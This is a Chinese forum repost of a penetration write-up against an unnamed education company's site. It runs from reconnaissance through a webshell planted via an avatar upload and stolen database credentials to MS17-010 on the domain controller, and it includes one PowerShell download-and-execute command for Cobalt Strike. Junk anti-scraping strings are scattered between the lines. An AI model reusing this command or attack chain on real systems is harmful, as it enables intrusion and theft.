|
( r2 t# k0 c6 w* q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路4 i8 |+ U. u# M' O4 y& a. o! r
" L3 j! J0 z. Y) M3 A Y# t6 f9 t9 y
8 O& v- M5 \1 V5 W6 E
+ K8 F2 i G7 ^' X1 w
) W& i( L& f0 X" h s 正文
0 n% E1 Z$ B) W- D3 K9 s
4 [! o) |4 x7 k) K" o* }4 ]9 `0 |8 w; M `% l# r, o3 w
; A( ~, W/ ?+ N4 l% y9 Y
# W; L' y X5 K2 `" E7 O. j9 i! t, w8 x4 q: c6 v, H3 ?4 k# c
目标:www.xxxx.com(一家教育机构)
$ V' |5 x1 b; B/ t. g5 Y
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能: i, b$ L( v' ?% b% V0 s' O& r
! W3 c+ ^4 B; n- G+ B1 @/ u
7 Y5 \$ b* o$ b0 K" P. M+ A: }% G  5 J7 g' X+ E# G7 l7 w! K
8 U( ?0 n S; y( M
4 |: H/ B% | x ~% _ Y 进行了简单的信息搜集
: U z+ T. x" j4 a4 {9 K; i1 t$ \
) I6 U: p! ]# \" W/ z( u
( N: m. Y8 O) c/ j8 K% ?! j1 C
0 F R4 x( O6 l& T* c% O6 W2 O" Y( n ?& Y9 g" X
子域名搜集3 A* H& n% k7 H
8 i' E3 s& g, W" c2 v1 `
1 `8 n) q3 `& }6 T% ^" c: w
 2 j& \* B1 K. a: Y4 ]$ j" Z5 o5 R8 e
3 ~3 n$ M, z( N& _3 m' f; N4 \
' U: ^. G- y( [9 I P' n
fofa找资产
7 }$ d. _2 h9 I( }& C
- P) [* S4 {5 \" u7 G. l
$ _1 w9 h9 q8 l2 h4 [6 X% \4 \$ ?
, j5 O$ W z; V+ w+ |5 t% l4 L/ J1 E( `0 x
2 E) @4 w0 ^( j( e: G2 x9 O- V
& D$ |. E* I% Q4 h) n) Y4 u1 w
一共七个资产。去重之后只有两个。
. U' K0 A7 `- v1 k) w# W3 c+ `% x
9 s# G& l& [: H
' P# Q/ ^0 R- z | 7 C" A0 c4 f( R7 y5 h+ z V
- @: | m3 o; R$ h4 a 目录探测
4 Z. {) m; p5 J8 H8 h$ q& @ P4 S # g B3 \/ b6 R8 z' ], Y0 w( v
( N: T3 B$ L9 `) g. k  # x0 E! B" R- E1 M$ ?9 P4 c' ~
6 A7 ~% s0 q9 i/ Y
) O9 C6 A7 e N' d3 W% b# Y 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( d3 C+ y# b- Q: h, ]/ X0 M
$ X( [- w: K9 W7 G1 S+ r4 d7 b( r% f4 ~% X" P1 ]# ]
- F( y/ @1 v: S, M X4 C3 B. }: c8 \& X) _
8 S, }6 g9 L/ k) ] 我又尝试了通过修改返回包来绕过登录界面
. _0 b! {- }7 e" z$ w) y $ c# H4 ~* X5 |% q& o% G" j
) h# E/ l, k- e) S n8 O/ k" \
4 c% j- d' u- c$ B 0 v2 p- K2 P5 ^2 Y) O% X
5 y* n1 M1 K3 V8 {7 R0 n/ c 还是不行,尝试注入无果
) }5 P/ v/ j3 ]8 G! P& d4 B& a6 K
! b# a7 A) C x3 K. @' ^4 Y( e/ n
* p5 G6 F$ f+ t. t- k! t( b9 @
( y* n$ Y2 I8 ?) g! @6 p/ t7 X1 m
# p @) i% u4 E. ?5 Y 不过我目录探测出了一处Spring信息泄露
* Q4 j& J4 w5 s
7 b& z: F1 y( d8 y4 l3 Y; Z
# n+ f% m7 c4 K4 G" W; I
9 a, o6 e6 D* n0 m7 R
5 }$ v$ F1 O$ S; {: s: ?  & ]3 \% U h5 C: S
/ z9 N, c! U- Y' K1 v" C7 j/ K d+ n u
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 l: I/ b, E% g' w4 G$ a8 x0 `
f, z9 @0 K# f7 Z
2 V" n# g' |& G( N" M0 d
3 [& R, }0 M6 n m9 q
& t5 g6 a1 w6 M. f9 S& a6 W; W: w1 o# P& u7 W! U! d& r
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
# r# ]3 f4 n, i 8 P7 U) ]5 l _0 w" z, j6 t. k# X
( Q2 G/ S `5 G) Z2 Q. _
7 q' ^, f5 f7 y8 L7 H
/ ]( Z8 Z8 s! \6 M, `3 X: C1 o" f7 m
获取有些师傅到这一步就手机抓包电脑测了。
2 S* n7 }( ^9 V7 ?) u x / }+ a+ L8 z* H( `2 U% F
) E1 [* _ }& F, S) j
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
: _4 S3 r5 v1 n' l7 j4 _( Y : O: ?/ |% ^& _
. D( B0 ]7 J+ z& q0 i d+ g+ w' }; n2 G
其中在一个公众号发现了小程序,可以进行注册。- A* w) c8 r. s* p. P
* F7 y {$ \+ [* c9 H
& C/ ?8 q0 `+ y% r 看到了头像上传,尝试上传获取WebShell( N. q, V% B- F+ @
7 {; K% f+ I( r- Z P' E4 ?9 E8 M4 x
 F6 C/ }5 w% C, ]* y) w
2 ~6 R( o/ x, m" {* ~5 T! a
2 n2 x3 l5 I1 x5 S 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
+ ]7 i5 ]! P1 r, g! g; \
2 _* E2 Y# R# n5 B8 G( Z/ o9 n) R$ c
, t3 X. r$ Z9 J" t2 [& b # e4 f* y0 K, h! ^8 d7 H$ d" Z
- r5 W) h; H) H/ c/ ?5 w* t
然后上了大马
% y: }8 q, U- j; M* | ! r! B/ n5 e2 p$ O
# z" a6 x3 o% \ 
$ S& _' {' m0 ]+ L5 h % C! e b( S5 f% }4 K
9 q* ]9 q$ ?, J8 I
 # T, F9 ^ ^# j- B: _, `$ U/ d
' M. p$ e3 c# H
3 m" S0 r2 Y6 _. n- s2 p$ m! m 通过翻找文件发现数据库账号密码6 Q( n( u9 p; A' n) d
2 F. _* E, z! _5 u
$ `. M$ h4 [( R6 `1 z, K 
4 N) B' t8 Z; n; X! [4 N& _ ( A9 C* q% R; ^# |- E
5 ^1 N+ _& }/ i9 @ --内网渗透' U+ j: ^& e1 @
* ]" c5 s2 E9 h0 o/ _/ }5 n2 B
1 ^) I7 M. E2 K 直接通过powershell执行 cs上线
( A+ v9 ]" @0 V & r' a% B0 X4 R4 c, F
2 u- V1 E' r8 O! b) D) H# \1 a2 x powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"0 P7 I; R5 e4 ^
O4 W5 z! X% F# R+ R3 _/ V( h/ [
9 L) F U3 y, X; G  ! c4 c5 X6 N& a
; A( d& d: X* `5 c8 ?2 }/ `9 A" i' S* d% L) |
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破; g. j4 x4 g8 h( `0 e! E
% J8 W- ~9 \8 U, V
2 z) n$ h* _8 o @ h$ i
6 X3 B1 ` H+ t
% P$ E4 Y' A* [' b8 y9 d2 r- N& @; Q* {6 m
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ u8 s5 G- N% k$ F
2 T, r4 i) ~: |: u7 s+ @( B) ]
( N; [. g, Q4 e* ]
& U$ `* y, t* K/ F3 k. Y% S ) y% v F& F( W! {8 E2 g3 a
/ b" r0 v2 A9 ]" O+ S& t& P p  & U) }& j% @( p7 ^/ N( I0 C
' P, B; b! L; H- i
# i& r3 g; E; {# X0 I+ ^7 y8 n
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
* N1 s$ v! a4 I+ {
7 V" I8 e" ~# O1 s9 s( U( x/ k
3 ^ n4 j4 r1 k$ w9 Z
6 Y7 h( C5 y5 l6 K3 d% a, Q
: t( H& t* j% X2 @ 
: c' v! L: e# x: t' q
7 C5 }9 J3 o; g7 }6 O
+ N' s2 n; B% @4 N6 L* |/ `
( B* X) y% A1 w" _! i9 J
9 e+ U. D) O) {
; @; z$ X- o, U& e6 p& j; p
: [, _. e# R0 k! p' F
0 M. C9 C) B& c" C : N7 s U6 D) N- D, Y
: j3 v; U( h" q" {
& ^5 L9 L$ v* ~" X' Q7 }5 {
小结+ t3 x. Y2 E9 ^+ j6 O, j! _: ~
W9 l5 j/ L3 o8 b: U; U5 U6 p
- Q1 Y. a; P3 ?5 e: i& N$ ? : [. b; h; x' ]& _, h
w1 u% P$ ?% }/ J {0 A* Z, x
) s: ] P6 X0 B/ f1 N$ }; ~* n- S+ Y. Z
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!- u' `2 _7 ^5 H# R/ D
$ H- e+ ?! `# \ b& y
7 G( D. K3 [+ w2 v, K
( b* P' t3 H. U8 \" n% U
, a- F3 N+ a! e. j( i" h. D% x% _0 U5 V! r* k- |% p5 L: {: D
- ' b) q/ a: Q; }) U0 _, S- Y
7 S. f: P9 R: [* y% e( ~9 Y
2 _* j' k: j, G% Q n, H - 4 t! Z* I+ _ C' `( d
" ?* |% R$ D6 p
* K2 A# p; e& U* A0 D: x" z - W% @9 l, g; v& }3 c' T( V
# D" m- Z. ^6 r+ E 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html$ {' O" I9 M! h4 n% @! B
% D4 V! B' W4 b5 ~1 S1 C
: z$ j1 A5 y6 @! l) t; b4 @/ u
; M; q/ y* H4 g4 j1 e9 S
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对